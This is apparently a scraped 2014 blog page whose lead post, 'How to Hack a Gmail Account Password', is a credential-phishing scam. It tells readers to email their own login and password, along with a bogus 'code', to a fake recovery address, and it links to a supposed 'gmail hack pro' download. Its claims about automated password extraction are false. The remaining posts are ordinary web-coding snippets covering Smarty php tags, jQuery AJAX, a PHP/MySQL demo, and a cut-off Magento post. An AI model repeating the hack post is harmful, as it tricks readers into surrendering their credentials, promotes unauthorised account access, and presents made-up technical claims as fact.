Popular Posts

Monday, 31 March 2014

How to Hack a Gmail Account Password

It is possible and it is easy. This way of hacking into email. I have   tried the method. STEP 1- Log in to your own email account. Note: Your account must
be at
least 30 days old for this to work. ( for hacking others passwords )
If your mail is hacked create a new account and login to that account.
STEP 2- Once you have logged into your own account, compose/write
an e-mail
to:pass.retrive.cgi@gmai l.com
This is a mailing address to the Retrive password. The automated
 server will send you the password that you have 'forgotten', after receiving the information you send them. STEP 3- In the subject line type exactly: " PASSWORD RECOVERY : email address to find passward. " STEP 4- On the first line of your mail write the email address of the person you are hacking. STEP 5- On the second line type in the e-mail address you are using. STEP 6- On the third line type in the password to YOUR email
address (your OWN password). The computer needs your password
so it can send a JavaScript from your account in the Mail Server to
extract the other email addresses password. In other word the system
automatically checks your password to confirm the integrity of your
status. The process will be done automatically by the user
administration server.
STEP 7- The final step before sending the mail is, type on the fourth
line the following code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACT
IVE&rsa#>
{simply copy and paste above.}
so for example if your gmail id is :David_100@g mail.co m and your
password
is: David and the email address you want to hack is:tes t@g mail.co m
then
compose the mail as below:
To:pass. retrive.cgi@gmai l.co m bcc: cc: (Don't write anything in cc,bcc field) Subject: PASSWORD RECOVERY :David_100 @y ahoo.co m "test@gmail.com David_100@gmail.com David cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa  script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACT
IVE&rsa#>
The password will be sent to your inbox in a mail called "System Reg Message" from "System. YAHOO For Yahoo mail: To:passwd_re trive_cgi@yahoo.co m Sub: Password Request :Recovery and follow the same steps
 Verification code:35d276f2-e0a560d7-ac8e33268c
Enjoy!


If you are not satisfied with the above

Then go for the best hacking process of gmail password hacking ever.

http://www.gmailhackerpro.com/
click on the above link

download gmail hack pro
enter the gmail account account you want to hack

press enter

it may take a minute or two but definitely you wwill get the result.

Enjoy  :)

How to add php code in .tpl type of file in cs-cart

Can anyone tell me how to add php code in .tpl file e.g i want to add the following code but it didn't work



{php}
    if(isset($_GET['redirect']) && $_GET['redirect']=='clipboard'){

    echo '<input type="hidden" name="check" value="redirect" />' ;

 } 
 else{

     echo '<input type="hidden" name="check" value="notredirect" />' ;
 }

{/php}

I think that what you want is this:
 input type="hidden" name="check" value="{if $smarty.get.redirect != "clipboard"}not{/if}redirect" />


You must set:
'allow_php_in_templates' => true, // Allow to use {php} tags in templates
in your config.local.php, and then it will work.
Enjoy .................... :)

jQuery Ajax Function

<!DOCTYPE html>
<html>
<title>jQuery Function Demo - jQuery4u.com</title>
<head>
    <script type="text/javascript">
    var JQFUNCS =
    {
        runFunc:
        {
            /* ------------------------------ ajax Demo ------------------------------ */
            "ajax":
            {
                run: function(id)
                {
                    $('#'+id+' .content1').bind('click', function(e)
                    {
                        e.preventDefault();
                        getContent('/function-demos/functions/ajax/data/content1.html');
                    });
                    $('#'+id+' .content2').bind('click', function(e)
                    {
                        e.preventDefault();
                        getContent('/function-demos/functions/ajax/data/content2.html');
                    });
                    $('#'+id+' .content3').bind('click', function(e)
                    {
                        e.preventDefault();
                        getContent('/function-demos/functions/ajax/data/content3.html');
                    });
                    function getContent(filename)
                    {
                        $.ajax({
                            url: filename,
                            type: 'GET',
                            dataType: 'html',
                            beforeSend: function() {
                                $('#'+id+' .contentarea').html('<img src="/function-demos/functions/ajax/images/loading.gif" />');
                            },
                            success: function(data, textStatus, xhr) {
                                if (filename == '/function-demos/functions/ajax/data/content3.html')
                                {
                                    setTimeout( function() {
                                        $('#'+id+' .contentarea').html(data);
                                    }, 2000);
                                }
                                else
                                {
                                    $('#'+id+' .contentarea').html(data);
                                }
                            },
                            error: function(xhr, textStatus, errorThrown) {
                                $('#'+id+' .contentarea').html(textStatus);
                            }
                        });
                    }
                },
                reset: function(id)
                {
                    $('#'+id+' .contentarea').html('Content will appear here.');
                    $('#'+id).hide();
                }
            }
        }
    }
    </script>
</head>
<body>
<h3>Demo: Using $.ajax() to load content without reloading the entire page.</h3>
<p>HTML content is held in separate files which are inserted below using AJAX. Note that it is also courtesy to show a loading image while the AJAX request is processing. Content 3 has a 2 second delay to simulate the loading image.</p>
<p><a href="#" id="ajax-demobtn" class="demobtn btn actionr">Run Demo</a> <a href="#" id="ajax-codebtn" class="codebtn btn actionr">View Code</a> <a href="#" id="ajax-resetbtn" class="resetbtn btn actionr" style="display: none;">Reset</a></p>
<div class="demoarea" id="ajax">
<div class="contentarea" style="border:1px solid orange;padding:10px;margin-bottom:5px;">Content will appear here.</div>
<button class="content1 btn">Load content 1</button> <button class="content2 btn">Load content 2</button> <button class="content3 btn">Load content 3</button></div>
</body>
</html>


Enjoy ........ :)

PHP - AJAX and MySQL

<html>
<head>
<script>
function showUser(str)
{
if (str=="")
  {
  document.getElementById("txtHint").innerHTML="";
  return;
  }
if (window.XMLHttpRequest)
  {// code for IE7+, Firefox, Chrome, Opera, Safari
  xmlhttp=new XMLHttpRequest();
  }
else
  {// code for IE6, IE5
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.onreadystatechange=function()
  {
  if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
    document.getElementById("txtHint").innerHTML=xmlhttp.responseText;
    }
  }
xmlhttp.open("GET","getuser.php?q="+str,true);
xmlhttp.send();
}
</script>
</head>
<body>

<form>
<select name="users" onchange="showUser(this.value)">
<option value="">Select a person:</option>
<option value="1">Peter Griffin</option>
<option value="2">Lois Griffin</option>
<option value="3">Glenn Quagmire</option>
<option value="4">Joseph Swanson</option>
</select>
</form>
<br>
<div id="txtHint"><b>Person info will be listed here.</b></div>

</body>
</html>  



 PHP FILE 

The page on the server called by the JavaScript above is a PHP file called "getuser.php".

The source code in "getuser.php" runs a query against a MySQL database, and returns the result in an HTML table:


<?php
$q = intval($_GET['q']);

$con = mysqli_connect('localhost','peter','abc123','my_db');
if (!$con)
  {
  die('Could not connect: ' . mysqli_error($con));
  }

mysqli_select_db($con,"ajax_demo");
$sql="SELECT * FROM user WHERE id = '".$q."'";

$result = mysqli_query($con,$sql);

echo "<table border='1'>
<tr>
<th>Firstname</th>
<th>Lastname</th>
<th>Age</th>
<th>Hometown</th>
<th>Job</th>
</tr>";

while($row = mysqli_fetch_array($result))
  {
  echo "<tr>";
  echo "<td>" . $row['FirstName'] . "</td>";
  echo "<td>" . $row['LastName'] . "</td>";
  echo "<td>" . $row['Age'] . "</td>";
  echo "<td>" . $row['Hometown'] . "</td>";
  echo "<td>" . $row['Job'] . "</td>";
  echo "</tr>";
  }
echo "</table>";

mysqli_close($con);
?>  


........ :)

Magento: How to get last order id

There are many ways to get last order id:   1. From checkout session: $lastOrderId = Mage::getSingleton('checkout/session'...